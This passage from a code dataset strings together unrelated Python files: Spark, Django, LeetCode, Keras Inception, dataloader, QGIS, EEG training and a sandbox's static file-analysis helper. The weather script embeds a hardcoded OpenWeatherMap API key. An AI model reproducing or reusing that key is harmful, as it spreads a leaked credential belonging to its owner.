invoiceWriterQuery.awaitTermination()\n","repo_name":"alessandro-montefusco/Spark-StructuredStreaming","sub_path":"02-FileStreamDemo/FileStreamDemo.py","file_name":"FileStreamDemo.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34651782345","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.Index, name=\"Index\"),\n path('books', views.Books, name=\"Books\"),\n path('shelfs', views.shelfs, name=\"shelfs\"),\n path('categorys', views.Categorys, name=\"categorys\"),\n\n path('api/Books/', views.BookAPI, name=\"BookAPI\"),\n path('api/Books/add/', views.AddBookAPI, name=\"AddBookAPI\"),\n path('api/Books//', views.BooksDetailsAPI, name=\"BooksDetailsAPI\"),\n path('api/Books/edit//', views.EditBookAPI, name=\"EditBookAPI\"),\n path('api/Books/delete//', views.DeleteBookAPI, name=\"DeleteBookAPI\"),\n\n path('api/Categorys/', views.CategoryAPI, name=\"CategoryAPI\"),\n path('api/Category/add/', views.AddCategoryAPI, name=\"AddCategoryAPI\"),\n path('api/Category//', views.CategorysDetailsAPI, name=\"CategorysDetailsAPI\"),\n path('api/Category/edit//', views.EditCategoryAPI, name=\"EditCategoryAPI\"),\n path('api/Category/delete//', views.DeleteCategoryAPI, name=\"DeleteCategoryAPI\"),\n\n path('api/shelfs/', views.ShelfAPI, name=\"ShelfAPI\"),\n path('api/shelf/add/', views.AddShelfAPI, name=\"AddShelfAPI\"),\n path('api/shelf//', views.ShelfsDetailsAPI, name=\"ShelfsDetailsAPI\"),\n path('api/shelf/edit//', views.EditShelfAPI, name=\"EditShelfAPI\"),\n path('api/shelf/delete//', views.DeleteShelfAPI, name=\"DeleteShelfAPI\"),\n\n \n]","repo_name":"ShrooqAyman/LMS---Django-Rest-Framework-","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22282546384","text":"# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n# If found in the array return its index, otherwise return -1\n\n# Input: nums = [4,5,6,7,0,1,2], target = 0\n# Output: 4\n\n# Input: nums = [4,5,6,7,0,1,2], target = 3\n# Output: -1\n\n# time: O(logN)\n# space: O(1)\n\nclass Solution(object):\n def search(self, nums, target):\n # solution 1: 72%\n def minIndex():\n if nums[0] < nums[-1]:\n return 0\n left, right = 0, len(nums)-1\n while (right-left) > 1:\n mid = (left+right)//2\n if nums[mid] < nums[right]:\n right = mid\n elif nums[mid] > nums[left]:\n left = mid\n return max(left, right)\n\n def binarySearch(left, right):\n while left <= right:\n mid = (left+right)//2\n if nums[mid] == target:\n return mid\n elif nums[mid] < 
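While developing a streaming job like the FileStreamDemo above, a throwaway console sink is often handier than the JSON file sink for eyeballing micro-batches. A sketch assuming the same flattened_df defined in that script:

debug_query = flattened_df.writeStream \
    .format("console") \
    .outputMode("append") \
    .option("truncate", "false") \
    .start()
debug_query.awaitTermination()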
target:\n left = mid+1\n else:\n right = mid-1\n return -1\n\n if not nums: return -1\n left, right = 0, len(nums)-1\n min_index = minIndex()\n if target >= nums[min_index] and target <= nums[right]: # when to search in the left part to min_index\n return binarySearch(min_index, right)\n elif target >= nums[min_index] and target >= nums[left]: # when to search in the right part to min_index\n return binarySearch(left, min_index)\n return -1 # when nums[right] < target < nums[left]\n\nif __name__ == '__main__':\n print(Solution().search(nums=[4, 5, 6, 7, 0, 1, 2], target=0)) # 4\n print(Solution().search(nums=[4, 5, 6, 7, 0, 1, 2], target=3)) # -1","repo_name":"WestLakeBao/Luyaos-LeetCode-sols-in-Python","sub_path":"033. Search in Rotated Sorted Array.py","file_name":"033. Search in Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34716000822","text":"from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Activation, \\\n Flatten, Dense, Input, AveragePooling2D, concatenate, BatchNormalization\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.initializers import random_uniform\n\n\nclass BNInception:\n \"\"\"\n Implementation of Inception version 2.\n \"\"\"\n\n def __init__(self, input_shape, classes):\n self.input_shape = input_shape\n self.classes = classes\n\n @staticmethod\n def __1by1_block(X, filters_1by1, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the 3by3 block. This block consist of 1x1 and 3x3 conv layers.\n :param X: input layer\n :param filters_1by1: number of 1x1 filters\n :param strides: size of stride\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_1by1 = None\n\n if filters_1by1 != 0:\n X_1by1 = Conv2D(filters=filters_1by1, kernel_size=strides, strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X)\n X_1by1 = BatchNormalization()(X_1by1)\n X_1by1 = Activation('relu')(X_1by1)\n\n return X_1by1\n\n @staticmethod\n def __3by3_block(X, reduced_filters_3by3, filters_3by3, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the 1by1 block. This block consist of 1x1 layer.\n :param X: input layer\n :param reduced_filters_3by3: number of 1x1 filters for dimensionality reduction\n :param filters_3by3: number of 3x3 filters\n :param strides: size of stride\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_reduced_3by3 = Conv2D(filters=reduced_filters_3by3, kernel_size=(1, 1), strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X)\n X_reduced_3by3 = BatchNormalization()(X_reduced_3by3)\n X_reduced_3by3 = Activation('relu')(X_reduced_3by3)\n\n X_3by3 = Conv2D(filters=filters_3by3, kernel_size=(3, 3), strides=strides,\n padding='same', kernel_initializer=initializer())(X_reduced_3by3)\n X_3by3 = BatchNormalization()(X_3by3)\n X_3by3 = Activation('relu')(X_3by3)\n\n return X_3by3\n\n @staticmethod\n def __3by3_double_block(X, double_reduced_filters_3by3, double_filters_3by3,\n strides, initializer=random_uniform):\n \"\"\"\n Implementation of the double 3by3 block. 
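The rotated-array solution above runs two binary searches, one to locate the pivot and one over the chosen half. A common single-pass alternative with the same O(log N) bound decides at each step which half is sorted:

def search_rotated(nums, target):
    left, right = 0, len(nums) - 1
    while left <= right:
        mid = (left + right) // 2
        if nums[mid] == target:
            return mid
        if nums[left] <= nums[mid]:  # left half is sorted
            if nums[left] <= target < nums[mid]:
                right = mid - 1
            else:
                left = mid + 1
        else:                        # right half is sorted
            if nums[mid] < target <= nums[right]:
                left = mid + 1
            else:
                right = mid - 1
    return -1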
This block consist of 1x1 and double 3x3 conv layers.\n :param X: input layer\n :param double_reduced_filters_3by3: number of 1x1 filters for dimensionality reduction\n :param double_filters_3by3: number of 3x3 filters for double 3x3 layers\n :param strides: size of stride.\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n # 1x1 layer\n X_double_reduced_3by3 = Conv2D(filters=double_reduced_filters_3by3, kernel_size=(1, 1),\n strides=(1, 1), padding='same', kernel_initializer=initializer())(X)\n X_double_reduced_3by3 = BatchNormalization()(X_double_reduced_3by3)\n X_double_reduced_3by3 = Activation('relu')(X_double_reduced_3by3)\n\n # first 3x3 layer\n X_double_3by_3 = Conv2D(filters=double_filters_3by3, kernel_size=(3, 3), strides=(1, 1),\n padding='same', kernel_initializer=initializer())(X_double_reduced_3by3)\n X_double_3by_3 = BatchNormalization()(X_double_3by_3)\n X_double_3by_3 = Activation('relu')(X_double_3by_3)\n\n # second 3x3 layer\n X_double_3by_3 = Conv2D(filters=double_filters_3by3, kernel_size=(3, 3), strides=strides,\n padding='same', kernel_initializer=initializer())(X_double_3by_3)\n X_double_3by_3 = BatchNormalization()(X_double_3by_3)\n X_double_3by_3 = Activation('relu')(X_double_3by_3)\n\n return X_double_3by_3\n\n @staticmethod\n def __pooling_block(X, pool_projection, pool_type, strides, initializer=random_uniform):\n \"\"\"\n Implementation of the pooling block. This block consist of pooling and 1x1 layer.\n :param X: input layer\n :param pool_projection: number of 1x1 filters for dimensionality reduction\n :param pool_type: type of pooling layer. max pooling or average pooling\n :param strides: size of stride.\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n X_pooling = None\n\n if pool_type == 'max':\n X_pooling = MaxPooling2D(pool_size=(3, 3), strides=strides, padding='same')(X)\n elif pool_type == 'avg':\n X_pooling = AveragePooling2D(pool_size=(3, 3), strides=strides, padding='same')(X)\n\n if pool_projection != 0:\n X_pooling = Conv2D(filters=pool_projection, kernel_size=(1, 1), strides=strides,\n activation='relu', padding='same',\n kernel_initializer=initializer())(X_pooling)\n\n X_pooling = BatchNormalization()(X_pooling)\n X_pooling = Activation('relu')(X_pooling)\n\n return X_pooling\n\n def __inception_v2_block(self, X, filters, reduced_filters, pool_type='avg', strides=(1, 1),\n initializer=random_uniform):\n \"\"\"\n This method creates the inception block.\n :param X: input layer\n :param filters: list of the number of filters\n :param reduced_filters: list of the number of 1x1 filters for dimensionality reduction\n :param pool_type: type of pooling layer. max pooling or average pooling\n :param strides: size of stride. For some layers are (2, 2) while for the others are (1, 1)\n :param initializer: to set up the initial weights of a layer. 
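The double 3x3 branch above is the core Inception-v2 factorization: two stacked 3x3 convolutions see the same 5x5 receptive field as one 5x5 convolution but with fewer weights. A quick back-of-the-envelope check (C is an illustrative channel count):

C = 64
print(5 * 5 * C * C)      # one 5x5 conv: 102400 weights
print(2 * 3 * 3 * C * C)  # two 3x3 convs: 73728 weights, roughly 28% fewer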
Equals to random uniform initializer\n :return:\n \"\"\"\n\n filters_1by1, filters_3by3, double_filters_3by3 = filters\n reduced_filters_3by3, double_reduced_filters_3by3, pool_projection = reduced_filters\n\n # 1x1 layer\n X_1by1 = self.__1by1_block(X=X, filters_1by1=filters_1by1, strides=strides,\n initializer=initializer)\n\n # 3x3 layer\n X_3by3 = self.__3by3_block(X=X, reduced_filters_3by3=reduced_filters_3by3,\n filters_3by3=filters_3by3,\n strides=strides, initializer=initializer)\n\n # Double 3x3 layers\n X_double_3by_3 = self.__3by3_double_block(X=X,\n double_reduced_filters_3by3=double_reduced_filters_3by3,\n double_filters_3by3=double_filters_3by3,\n strides=strides,\n initializer=initializer)\n\n # max pooling layer\n X_pooling = self.__pooling_block(X=X, pool_projection=pool_projection,\n pool_type=pool_type, strides=strides,\n initializer=random_uniform)\n\n # concatenate layers\n if X_1by1 is None:\n X_concat = concatenate(inputs=[X_3by3, X_double_3by_3, X_pooling])\n else:\n X_concat = concatenate(inputs=[X_1by1, X_3by3, X_double_3by_3, X_pooling])\n\n X_concat = Activation('relu')(X_concat)\n\n return X_concat\n\n def __auxiliary_classifier(self, X, output_name, initializer=random_uniform):\n \"\"\"\n This method creates an auxiliary classifier.\n :param X: input layer\n :param output_name: name of output layer\n :param initializer: to set up the initial weights of a layer. Equals to random uniform initializer\n :return:\n \"\"\"\n\n # Average pooling layer\n X_average_pool = AveragePooling2D(pool_size=(5, 5), strides=(3, 3), padding='valid')(X)\n\n # Convolution layer for dimensionality reduction\n X_conv = Conv2D(filters=128, kernel_size=(1, 1), strides=(1, 1), padding='same',\n kernel_initializer=initializer())(X_average_pool)\n X_conv = BatchNormalization()(X_conv)\n X_conv = Activation('relu')(X_conv)\n\n # Flatten layer\n X_flatten = Flatten()(X_conv)\n\n # FC layer\n X_fc = Dense(units=1024, activation='relu', kernel_initializer=random_uniform())(X_flatten)\n\n # Dropout layer\n X_dropout = Dropout(rate=0.7)(X_fc)\n\n # Auxiliary output layer\n X_aux_output = Dense(units=self.classes, activation='softmax', name=output_name,\n kernel_initializer=random_uniform())(X_dropout)\n\n return X_aux_output\n\n def __call__(self):\n \"\"\"\n Builds the google_net architecture\n :return:\n \"\"\"\n\n X_input = Input((self.input_shape[0], self.input_shape[1], 3))\n\n # Layer 1\n X = Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), padding='same',\n kernel_initializer=random_uniform)(X_input)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 2\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same')(X)\n\n # Layer 3\n X = Conv2D(filters=64, kernel_size=(1, 1), strides=(1, 1), padding='valid',\n kernel_initializer=random_uniform)(X)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 4\n X = Conv2D(filters=192, kernel_size=(3, 3), strides=(1, 1), padding='same',\n kernel_initializer=random_uniform)(X)\n X = BatchNormalization()(X)\n X = Activation('relu')(X)\n\n # Layer 5\n X = MaxPooling2D(pool_size=(3, 3), strides=(2, 2), padding='same')(X)\n\n # Inception 3a\n X = self.__inception_v2_block(X=X, filters=(64, 64, 96), reduced_filters=(64, 64, 32),\n pool_type='avg')\n\n # Inception 3b\n X = self.__inception_v2_block(X=X, filters=(64, 96, 96), reduced_filters=(64, 64, 64),\n pool_type='avg')\n\n # Inception 3c\n X = self.__inception_v2_block(X=X, filters=(0, 160, 96), reduced_filters=(64, 64, 0),\n strides=(2, 2), 
pool_type='max')\n\n # Inception 4a\n X = self.__inception_v2_block(X=X, filters=(224, 96, 128), reduced_filters=(64, 96, 128),\n pool_type='avg')\n\n # Inception 4b\n X = self.__inception_v2_block(X=X, filters=(192, 128, 128), reduced_filters=(96, 96, 128),\n pool_type='avg')\n\n # Inception 4c\n X = self.__inception_v2_block(X=X, filters=(160, 160, 160), reduced_filters=(128, 128, 128),\n pool_type='avg')\n\n # Inception 4d\n X = self.__inception_v2_block(X=X, filters=(96, 192, 192), reduced_filters=(128, 160, 128),\n pool_type='avg')\n\n # Inception 4e\n X = self.__inception_v2_block(X=X, filters=(0, 192, 256), reduced_filters=(128, 192, 0),\n strides=(2, 2), pool_type='max')\n\n # Inception 5a\n X = self.__inception_v2_block(X=X, filters=(352, 320, 224), reduced_filters=(192, 160, 128),\n pool_type='avg')\n\n # Inception 5b\n X = self.__inception_v2_block(X=X, filters=(352, 320, 224), reduced_filters=(192, 192, 128),\n pool_type='max')\n\n # Layer 17\n X = AveragePooling2D(pool_size=(7, 7), strides=(1, 1), padding='valid')(X)\n X = Flatten()(X)\n\n # Layer 18\n X = Dropout(rate=0.4)(X)\n\n # Layer 19\n X = Dense(units=1000, activation='relu', kernel_initializer=random_uniform())(X)\n\n # Layer 20\n output = Dense(units=self.classes, activation='softmax', name='output',\n kernel_initializer=random_uniform())(X)\n\n # Create model\n model = Model(inputs=X_input, outputs=output)\n\n return model\n","repo_name":"MrRiahi/Convolutional-Neural-Networks-Tensorflow","sub_path":"src/Inceptions/BN_Inception.py","file_name":"BN_Inception.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"11208776669","text":"order = input().split()\n\nd = 1\nfor i in range(7):\n d *= int(order[i + 1]) - int(order[i])\n\nif d == 1:\n print('ascending')\nelif d == -1:\n print('descending')\nelse:\n print('mixed')\n","repo_name":"jwkweon/BOJ","sub_path":"[2920]음계.py","file_name":"[2920]음계.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25353485310","text":"import torch\nimport numpy as np\n\nfrom config import *\n\nclass Dataloader:\n def __init__(self, data: list, batch_size: int, shuffle: bool = False) -> dict:\n self.data = data\n self.batch_size = batch_size\n self.shuffle = shuffle\n \n def get_padded_sequences(self, lines: list):\n max_line_len = len(max(lines, key=len))\n \n return np.array([[BOS_IDX] + line + [EOS_IDX] + [PAD_IDX] * (max_line_len - len(line))\n for i, line in enumerate(lines)]\n )\n \n def collate_fn(self, batch: list) -> dict:\n \"\"\"\n Return dict with english sentences and arabic sentences\n \"\"\"\n src = []\n trg = []\n for elem in batch:\n src.append(self.data[elem][0])\n trg.append(self.data[elem][1])\n \n in_src = self.get_padded_sequences(src) # padded inputs\n in_trg = self.get_padded_sequences(trg) \n \n return {\"src\": torch.tensor(in_src, dtype=torch.long), \"trg\": torch.tensor(in_trg, dtype=torch.long)}\n\n def __iter__(self):\n num_batches = int(np.ceil(len(self.data) / self.batch_size))\n if self.shuffle:\n perm = torch.randperm(len(self.data))\n for batch_start in range(num_batches):\n \n batch = perm[batch_start * self.batch_size:(batch_start + 1) * self.batch_size]\n yield self.collate_fn(batch)\n else:\n len_data = [i for i in range(len(self.data))]\n for batch_start in range(num_batches):\n batch = len_data[batch_start * self.batch_size:(batch_start + 1) * 
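A minimal smoke test for the BNInception class above. The 224x224 input size is my assumption, chosen so the feature map reaching the 7x7 average pool at the head is exactly 7x7 (224 to 112 to 56 to 28 to 14 to 7 across the five stride-2 stages):

model = BNInception(input_shape=(224, 224), classes=1000)()
model.compile(optimizer='adam', loss='categorical_crossentropy',
              metrics=['accuracy'])
model.summary()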
self.batch_size]\n yield self.collate_fn(batch)\n\n\n def __len__(self):\n \"\"\"\n Return length of dataloader\n \"\"\"\n return int(np.ceil(len(self.data) / self.batch_size))\n ","repo_name":"KristinaRay/english-arabic-nmt-bot","sub_path":"data/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31626143018","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nk = int(input())\n\ndef calc(n):\n s = str(n)\n s_len = len(s)\n dp = [[0] * 12 for _ in range(s_len)]\n dp_o = [[0] * 12 for _ in range(s_len)]\n for i in range(1,int(s[0])):\n dp[0][i+1] = 1\n dp_o[0][int(s[0])+1] = 1\n\n for i in range(0,s_len-1):\n dp[i+1][1] = dp[i][1] + dp[i][2] + 1\n for k in range(2,11):\n dp[i+1][k] = dp[i][k-1] + dp[i][k] +dp[i][k+1] + 1\n dp[i+1][1] -= 1\n\n if(i != s_len-1):\n j_b = int(s[i])\n j_n = int(s[i+1])\n for j in range( max(0,j_b-1), min(9,j_b+1)+1 ):\n if( j < j_n):\n dp[i+1][j+1] += dp[i][j_b+1]\n if(abs(j_n-j_b)<=1):\n dp_o[i+1][j_n+1] += dp_o[i][j_b+1]\n ans = 0\n for i in range(12):\n ans += dp[-1][i] + dp_o[-1][i]\n\n for tmp in dp:\n print(tmp)\n for tmp in dp_o:\n print(tmp)\n\n # print(dp)\n # print(dp_o)\n\n return ans\n\nprint(calc(3234566667))\n","repo_name":"komajun365/competitive_programming","sub_path":"abc/abc161/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72628443687","text":"import requests\r\n\r\nAPI_KEY = \"b7aedb8aa48fb59cf9f6c7eb405f0844\"\r\ncidade = \"Sao Paulo\"\r\nlink = f\"https://api.openweathermap.org/data/2.5/weather?q={cidade}&appid={API_KEY}&lang=pt_br&units=metric\"\r\n\r\nrequisicao = requests.get(link)\r\nrequisicao_dic = requisicao.json()\r\ndescrisao = requisicao_dic[\"weather\"][0]['description']\r\ntemperatura = requisicao_dic['main']['temp']\r\ncidade = requisicao_dic['name']\r\numidade = requisicao_dic['main']['humidity']\r\nprint (cidade ,descrisao, f\"{temperatura}°C\", f\"Umidade relativa do ar {umidade}%\")","repo_name":"Henry0005/Weather-API","sub_path":"Weather Português.py","file_name":"Weather Português.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73435574249","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Rudolf Sandbox\n# version = 0.1\n# author = felicitychou\n# email = felicitychou@hotmail.com\n\n# standard\nimport binascii\nimport hashlib\nimport os\nimport subprocess\nimport sys\nsys.path.append(\"..\")\n\n# third\nimport magic\nimport ssdeep\n\n# self\nfrom utils.ELFParser import ELF\n\nclass BasicAnalyzer(object):\n\n def __init__(self,filepath,logger,conf):\n\n self.filepath = filepath\n self.logger = logger\n self.conf = conf\n self.run()\n\n def run(self):\n\n try:\n # get basic info\n self.filename = os.path.basename(self.filepath)\n self.filetype = magic.from_file(self.filepath)\n self.filesize = int(os.path.getsize(self.filepath))\n # get hash\n self.md5 = self.hash_file('md5')\n self.sha256 = self.hash_file('sha256')\n self.crc32 = self.get_crc32()\n self.ssdeep = self.get_ssdeep()\n\n # get strings\n self.get_strings()\n self.strings = 
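A hedged usage sketch for the custom Dataloader above. The (src, trg) token-id pairs are illustrative, and BOS_IDX, EOS_IDX and PAD_IDX are assumed to come from the project's config module as the import suggests:

pairs = [([5, 6, 7], [8, 9]), ([4], [10, 11, 12]), ([2, 3], [7])]
loader = Dataloader(pairs, batch_size=2, shuffle=True)
for batch in loader:
    # each sequence is wrapped in BOS/EOS and padded to the batch max
    print(batch["src"].shape, batch["trg"].shape)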
{\"ascii\":self.ascii_strings,\"unicode\":self.unicode_strings}\n\n # get packer info (self.packer)\n self.packer = None\n self.get_packer_info()\n\n # get elf info (self.elf_info)\n if -1 != self.filetype.find('ELF'):\n self.get_elf_info()\n else:\n self.elf_info = None\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # output list\n def output(self):\n #return ['filename','filetype','filesize','md5','sha256','crc32','ssdeep','strings','packer','elf_info']\n return {\n 'filename':self.filename,\n 'filetype':self.filetype,\n 'filesize':self.filesize,\n 'md5':self.md5,\n 'sha256':self.sha256,\n 'crc32':self.crc32,\n 'ssdeep':self.ssdeep,\n 'strings':self.strings,\n 'packer':self.packer,\n 'elf_info':self.elf_info,\n }\n\n # get packer info:\n def get_packer_info(self):\n # ELF (UPX)\n cmd = [self.conf[\"UPX_Path\"],\"-q\", \"-t\",self.filepath]\n output = subprocess.getoutput(cmd)\n if -1!=output.find(\"[OK]\"):\n self.packer = \"upx\"\n else:\n self.packer = None\n \n # get elf info\n def get_elf_info(self):\n self.elf_info = {}\n elffile = ELF(self.filepath)\n\n self.elf_info['header'] = elffile.OutputELFHeader()\n self.elf_info['section_headers'] = elffile.OutputELFShdr()\n self.elf_info['segment_headers'] = elffile.OutputELFPhdr()\n\n\n # get strings unicode and ascii \n def get_strings(self):\n # linux return string list\n try:\n self.ascii_strings = subprocess.check_output([\"strings\", \"-a\", self.filepath]).decode().splitlines()\n self.unicode_strings = subprocess.check_output([\"strings\", \"-a\", \"-el\", self.filepath]).decode().splitlines()\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # get hash ('md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512')\n def hash_file(self, hash_type):\n try:\n hash_handle = getattr(hashlib, hash_type)()\n with open(self.filepath, 'rb') as file:\n hash_handle.update(file.read())\n return hash_handle.hexdigest()\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n \n # get crc32\n def get_crc32(self):\n try:\n with open(self.filepath, 'rb') as file:\n return '%x' % (binascii.crc32(file.read()) & 0xffffffff)\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n\n # get ssdeep\n def get_ssdeep(self):\n try:\n return ssdeep.hash_from_file(self.filepath)\n except Exception as e:\n self.logger.exception('%s: %s' % (Exception, e))\n","repo_name":"felicitychou/Rudolf","sub_path":"core/basic_analyze.py","file_name":"basic_analyze.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69820552170","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n\nfrom supervised.logistic_regression import LogisticRegression\nfrom supervised.linear_regression import AnalyticalLinearRegression\nfrom utils.preprocessing import add_dummy_feature\n\nseed = 2\nnp.random.seed(seed)\n\nn_samples = 8\n\nX = np.array([i for i in np.linspace(-1, 0, n_samples // 2)] + [i for i in np.linspace(0.5, 1.5, n_samples // 2)])\nX_ = np.array([i for i in np.linspace(-1, 0, n_samples // 2)] +\n [i for i in np.linspace(0.5, 1.5, n_samples // 2)] + [3, 4, 5])\n\ny = np.zeros(n_samples)\ny_ = np.zeros(len(X_))\n\ny[n_samples // 2:] = 1\ny_[n_samples // 2:] = 1\n\nreg1 = AnalyticalLinearRegression()\nreg2 = AnalyticalLinearRegression()\n\nreg1.fit(X[:, None], y)\nreg2.fit(X_[:, None], y_)\n\n\nfig = plt.figure(figsize=(20, 
10))\n\nax1 = fig.add_subplot(211)\nax1.set_ylim([-0.2, 1.2])\n\nclass1, = ax1.plot(X[n_samples // 2:], y[n_samples // 2:], \"xg\")\nclass2, = ax1.plot(X[:n_samples // 2], y[:n_samples // 2], \"xr\")\n\ndecision_boundary = (0.5 - reg1.coef_[0]) / reg1.coef_[1]\ndecision, = ax1.plot([decision_boundary, decision_boundary], [-0.5, 1.5], '--')\nax1.plot(X, reg1.predict(X[:, None]), \"b\")\n\nax1.legend([decision, class1, class2], [\"decision boundary\", \"Class 1\", \"Class 2\"])\n\nax2 = fig.add_subplot(212)\nax2.set_ylim([-0.2, 1.2])\n\nclass1, = ax2.plot(X_[n_samples // 2:], y_[n_samples // 2:], \"xg\")\nclass2, = ax2.plot(X_[:n_samples // 2], y_[:n_samples // 2], \"xr\")\ndecision_boundary = (0.5 - reg2.coef_[0]) / reg2.coef_[1]\ndecision, = ax2.plot([decision_boundary, decision_boundary], [-0.5, 1.5], '--')\n\nax2.plot(X_, reg2.predict(X_[:, None]), \"b\")\nax2.legend([decision, class1, class2], [\"decision boundary\", \"Class 1\", \"Class 2\"])\n\nplt.show()\n","repo_name":"ValentinCalomme/skratch","sub_path":"source/visualization/linear_regression_classification.py","file_name":"linear_regression_classification.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"6433596271","text":"########################################\n# 학번 :30120 이름:이화준\n########################################\n# 화일을 학번 이름으로 먼저 저장하세요. 예) 30129김상일\n\n# <문제 1> \n# - 숫자 5개를 입력받고 입력 받은 수 중에서 가장 큰 수를 출력하세요.\n# - 숫자 5개를 입력받는 부분은 for 반복문으로 작성하세요.\n\nmaxnum = 0\nfor i in range(5) :\n a = int(input(\"숫자를 입력해주세요 : \"))\n if a > maxnum :\n maxnum = a\n \nprint(maxnum)\n\nprint('--'*45)\n\n# <문제 2>\n# 1. 생년월일을 다음과 같이 8자리로 입력 받는다.\n# 예) 20031127\n# \n# 2. 입력 받은 생년월일을 다음과 같이 처리해서 출력한다.\n# 예) 2003년 11월 27일\n\nbirth = input(\"생년월일을 8자리로 입력해주세요 : \")\n\nyear = birth[0:4]\nmonth = birth[4:6]\nday = birth[6:8]\n\nprint(\"%s년 %s월 %s일\" %(year, month, day))\n\nprint('--'*45)\n\n# <문제 3> \n# - 다음 조건을 만족하는 프로그램을 작성하세요.\n# - 무한 반복되는 while 문을 사용한다.\n# - 두 수를 입력 받아서 두 수가 같으면 break 문을 사용해 무한 반복문을 종료한다.\n\nd = 1\nwhile d == 1 :\n b= int(input(\"첫번째 정수를 입력해주세요 : \"))\n c= int(input(\"두번째 정수를 입력해주세요 : \"))\n print(\"첫번째 : %3d 두번째 : %3d\" %(b, c))\n if b == c :\n print(\"입력하신 두 정수가 동일하여 반복을 종료합니다.\")\n break\n\nprint('--'*45)\n\n# <문제 4> \n# - 다음 조건을 만족하는 프로그램을 작성하세요.\n# - 1부터 50까지의 수를 출력한다. 
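A quick check of the boundary algebra used in the plotting script above: linear regression crosses 0.5 exactly at x = (0.5 - w0) / w1, assuming coef_ holds [intercept, slope], which is what the decision_boundary expressions imply:

w0, w1 = reg1.coef_
x_star = (0.5 - w0) / w1
assert abs(w0 + w1 * x_star - 0.5) < 1e-9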
단, 3의 배수는 출력하지 않는다.\ne = 1\nfor x in range(50) :\n if e % 3 != 0 :\n print(e)\n e = e + 1\n \n\n\n\n\n","repo_name":"Prime0220/Python","sub_path":"Challenge/20210531_codingtest.py","file_name":"20210531_codingtest.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21464186574","text":"import processing\nimport os\nimport glob\n\nsrc_folder = 'C:/rasters'\ndst_folder = 'C:/output_kml'\n\nif not os.path.exists(dst_folder):\n os.mkdir(dst_folder)\n\nrasters = glob.glob(src_folder + '/*.asc')\n#print (rasters)\n\nfor raster in rasters:\n try:\n dst_name = os.path.splitext(os.path.basename(raster))[0]\n parameters = {\n 'BAND' : 1, \n 'EIGHT_CONNECTEDNESS' : True, \n 'EXTRA' : '',\n 'FIELD' : 'VALUE',\n 'INPUT' : raster,\n 'OUTPUT' : os.path.join(dst_folder,f'{dst_name}_kml.kml')}\n feedback = QgsProcessingFeedback()\n processing.runAndLoadResults('gdal:polygonize',parameters,feedback=feedback)\n except:\n print(\"processing error\")","repo_name":"Juanjolizard/scripts_pyqgis","sub_path":"raster_to_kml.py","file_name":"raster_to_kml.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13874905606","text":"import torch\nimport scipy.io as sio\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nimport torch.optim as optim\nfrom xai_all import CompactCNN\nfrom adhd_classification import data_load\nfrom sklearn.model_selection import train_test_split\n\n#torch.cuda.empty_cache()\n#torch.manual_seed(0)\n\ndef run():\n PATH_DATASET_MAT = r\"C:\\Users\\Ahmed Guebsi\\Downloads\\ADHD_part1\"\n\n x_data, y_data, subIdx = data_load(PATH_DATASET_MAT)\n print(\"suuuuuuub 